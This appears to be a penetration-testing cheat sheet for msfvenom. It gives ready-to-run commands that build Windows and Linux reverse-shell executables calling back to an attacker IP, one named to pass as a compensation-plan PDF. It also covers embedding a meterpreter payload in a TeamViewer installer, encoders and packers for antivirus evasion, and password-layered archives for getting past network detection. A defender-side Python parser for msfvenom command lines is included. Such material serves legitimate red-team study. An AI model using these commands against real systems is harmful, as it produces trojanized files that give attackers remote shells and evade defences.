msfvenom

Listing Payloads

msfvenom -l payloads

Staged vs Stageless payloads

windows/meterpreter/reverse_tcp vs windows/meterpreter_reverse_tcp

The former is staged: after the architecture, each / separates a stage. The latter has no / after the meterpreter part, so it is stageless.

Creating a payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

  • -p payload to build

  • -f output format

List options

msfvenom -p java/jsp_shell_reverse_tcp --list-options

Basic msfvenom

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

One can also use -a to specify the architecture or --platform to specify the platform.

Listing

msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Encoding

-b "\x00" -e x86/shikata_ga_nai

  • -b bad bytes to avoid

  • -e encoder to use

Antivirus evasion

Hiding payload inside of legitimate executables

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

  • -i iterations of encoding

  • -k keep the template's normal execution

  • -x input file (template) to embed the payload into

  • -o output file
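As an added defender-side example (my code, not part of the original page), the following Python parses a recorded msfvenom command line such as the ones above, as it might appear in process-creation telemetry, into the payload name, its staged/stageless classification using the naming rule from the staged vs stageless section, the C2 options, encoder settings and output file. The ARCH_TOKENS list, the field names and the constructed sample line are assumptions.

```python
import shlex

# Arch components between platform and payload name (assumed list; extend as needed).
ARCH_TOKENS = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc"}

# Flags (and the shell redirection) that take a value, mapped to a field name.
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-e": "encoder", "-x": "template",
               "-o": "output", ">": "output", "-a": "arch_flag", "-b": "badchars",
               "--platform": "platform_flag", "-i": "iterations"}

def classify_payload(name):
    """Naming rule: after platform (and optional arch), stage/stager is staged,
    a single stage_stager component is stageless. Returns (platform, arch, kind)."""
    parts = name.split("/")
    rest = parts[1:]
    arch = None
    if rest and rest[0] in ARCH_TOKENS:
        arch, rest = rest[0], rest[1:]
    return parts[0], arch, ("staged" if len(rest) >= 2 else "stageless")

def parse_msfvenom_cmdline(cmdline):
    """Extract payload, C2 options, encoder settings and output file from a
    recorded msfvenom command line (e.g. process-creation telemetry)."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "msfvenom":
        return None
    info = {"payload": None, "keep": False, "iterations": "1", "options": {}}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_FLAGS and i + 1 < len(argv):
            info[VALUE_FLAGS[tok]] = argv[i + 1]
            i += 2
            continue
        if tok == "-k":
            info["keep"] = True                 # template keeps running, payload injected
        elif "=" in tok and not tok.startswith("-"):
            key, val = tok.split("=", 1)
            info["options"][key] = val          # LHOST=, LPORT=, EXITFUNC=, ...
        elif info["payload"] is None and "/" in tok and not tok.startswith("-"):
            info["payload"] = tok               # bare payload name given without -p
        i += 1
    if info["payload"]:
        info["platform"], info["arch"], info["kind"] = classify_payload(info["payload"])
    info["iterations"] = int(info["iterations"])
    return info

# Constructed sample: the page's first payload command as it might appear in a log.
SAMPLE = ("msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 "
          "-f exe > BonusCompensationPlanpdf.exe")
```

Feeding `SAMPLE` to `parse_msfvenom_cmdline` yields the LHOST/LPORT pair and the output file name, which are the fields worth alerting on or correlating with network logs.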

Archiving

Use multiple zip/rar/compression layers with passwords to evade detection on the network.

Packing

A list of popular packer software:

  • Alternate EXE Packer

  • ExeStealth

  • Morphine

  • MEW

  • Themida

Also see PolyPack.
